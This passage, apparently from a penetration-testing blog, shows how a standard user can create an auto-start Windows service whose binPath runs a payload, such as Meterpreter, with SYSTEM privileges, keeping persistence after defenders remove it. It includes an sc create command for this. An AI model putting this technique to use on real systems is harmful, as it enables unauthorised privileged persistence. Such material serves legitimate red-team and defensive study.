The service configuration utility could be used to create a new service. The “_binPath_” parameter could store the arbitrary payload which will executed once the service starts. It should be noted that since the permissions of the service control manager changed, non elevated users can also create new services on the windows environment. In the event that the malicious service is removed by the blue team permissions will still remain allowing standard users to continue create new services to maintain persistence.

    sc create pentestlab displayName= "pentestlab" binPath= "C:\temp\pentestlab.exe" start= auto

Service Control Manager – New Service from Standard User Account

The new service will appear in the list of Windows services.

Service Control Manager – New Service

When the system starts again, the service will automatically initiate and the payload will executed with SYSTEM level privileges.

Service Control Manager – Meterpreter

**Post navigation**

Tag

#microsoft